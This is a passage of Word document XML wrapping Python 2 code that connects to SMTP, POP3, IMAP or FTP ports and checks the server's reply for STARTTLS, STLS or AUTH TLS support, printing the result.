    <w:p w14:paraId="2E9B3DAF" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="149A4123" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC19807" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="29F24D37" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F88F672" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="5463477C" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>atls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBA323D" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="25265854" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B176642" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="5BBAC05A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                # check if smtp supports </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>starttls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="26721663" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="01D197B4" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                if port in {25, 587}:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B58FA8" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="305513E0" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    print 'SMTP Port... Checking for STARTTLS Capability...'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE83BCF" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="4A4B6052" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    check = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s.recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(1024)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BB07C0" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="4A25220C" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("EHLO someone.org\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D980346" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="1BC250E6" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sys.stdout.flush</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A65170" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="6F8EECE8" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    check += </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s.recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(1024)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59237B76" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="41444F62" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.verbose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A6438E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="297AA070" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        print check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6069BA48" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="531C54F1" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F373E7" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="16B209EF" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    if "STARTTLS" in check:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4733E553" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="2CF17BC8" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.starttls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4726628D" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="269F8C39" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        print "STARTTLS command found"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D327BE" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="2CA89757" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "STLS" in check:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC2ACFC" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="79732B37" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.starttls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524DDDDB" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="10450496" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CDA2CB" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="65EB1757" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        print "STLS command found"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EB5D65" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="0E6A97AD" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A49933A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="63A1E791" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        print "STARTTLS command NOT found!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553D9B2A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="37766CE8" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        print '##################################################################'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553CC12B" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="16CB7400" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162DF4A0" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7C0E62AE" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EECB521" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="69EDA002" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                # check if pop3/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>imap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> supports </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>starttls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C205194" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="5EE68756" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> port in {110, 143}:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE2CFA6" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="3444F23D" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    print 'POP3/IMAP4 Port... Checking for STARTTLS Capability...'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540DED51" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="3556307E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    check = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s.recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(1024)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468F131C" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="79DD01FE" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    if port == 110:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA271E6" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="28F84B83" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("CAPA\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5875BAF4" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="3791FEBA" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    if port == 143:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E60879" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="71E0012A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("CAPABILITY\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3999A829" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="56D50921" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sys.stdout.flush</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CC27D5" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="4420DEFC" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    check += </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s.recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(1024)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1743C3" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="638F5DFD" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.verbose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E159E10" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="6E5D758C" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        print check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12735C5F" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="6EAB5A30" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAFCDB0" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7972A24A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    if "STARTTLS" in check:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC8EA6B" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="5FD5D653" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.starttls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298C049F" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7B9A12C3" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        print "STARTTLS command found"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CEBC39" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7617BA6F" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "STLS" in check:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07582B77" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="5C882083" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.starttls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5428D7" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="50AFA57C" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6C56BE" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="4048A8EA" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        print "STLS command found"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E84F672" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="0DEF3A4D" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9C4902" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="5FA98B92" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        print "STARTTLS command NOT found!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065C4293" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="1C72AF69" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                        print '##################################################################'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C016D9" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="42397C84" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326AAD32" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="41831774" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D279122" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="51F7B6F1" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                # check if ftp supports auth </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>starttls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2732237A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="4987D6B0" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> port in {21}:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B43EFD5" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7854ACAC" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    print 'FTP Port... Checking for AUTH TLS Capability...'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63712AB5" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="07805513" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    check = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s.recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(1024)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614C5BEB" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="496F320B" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("FEAT\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DFAA82" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="249D2741" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sys.stdout.flush</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF79CEA" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="254B8E9B" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    check += </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s.recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(1024)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAAA2BA" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="5331B247" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.verbose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34913F89" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="433F3A45" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        print check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAB3830" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="22978273" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
    </w:p>
